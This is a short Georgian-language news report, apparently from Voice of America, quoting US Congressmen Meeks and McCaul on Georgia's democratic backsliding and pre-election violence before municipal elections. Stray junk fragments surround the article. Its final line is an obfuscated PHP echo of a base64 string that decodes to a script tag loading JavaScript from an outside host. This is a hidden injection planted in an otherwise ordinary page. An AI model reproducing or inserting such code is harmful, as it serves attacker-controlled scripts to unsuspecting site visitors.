celsiusi
ავერსი შნაიდერი
ჩვენ ვრჩებით შეშფოთებულნი დემოკრატიის კუთხით საქართველოს განგრძობადი უკუსვლით, პოლიტიკური პოლარიზაციით და წინასაარჩევნო ძალადობის შესახებ ცნობებით, - ამის შესახებ „ამერიკის ხმის“ ქართულ რედაქციასთან საუბრისას კონგრესის წარმომადგენელთა პალატის საგარეო კომიტეტის თავმჯდომარე, დემოკრატი კონგრესმენი გრეგორი მიკსი და კომიტეტის წამყვანი რესპუბლიკელი წევრი, მაიკლ მაკკოლი აცხადებს.
 
მათი თქმით, იმისთვის, რომ საქართველომ ნატო-ს, ეუთო-ს და ევროკავშირის დემოკრატიული სტანდარტები შეასრულოს, ყველა მხარემ ამ თვის არჩევნებზე დემოკრატიული ღირებულებების შესაბამისად უნდა იმოქმედოს.
 
„ამ უქმეების მუნიციპალური არჩევნების მოლოდინთან ერთად, ჩვენ ვრჩებით შეშფოთებულნი დემოკრატიის კუთხით საქართველოს განგრძობადი უკუსვლით, პოლიტიკური პოლარიზაციით და წინასაარჩევნო ძალადობის შესახებ ცნობებით. იმისთვის, რომ საქართველომ ნატოს, ეუთოს და ევროკავშირის დემოკრატიული სტანდარტები შეასრულოს, ყველა მხარემ ამ თვის არჩევნებზე დემოკრატიული ღირებულებების შესაბამისად უნდა იმოქმედოს. ჩვენ არჩევნებს ყურადღებით დავაკვირდებით. ველოდებით ეუთოს სადამკვირვებლო მისიის მიგნებებს და ვრჩებით ერთგულნი საქართველოში მონაწილეობრივი დემოკრატიისა, არჩევნების დღის მიღმაც“, - აცხადებენ კონგრესმენები.
960
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");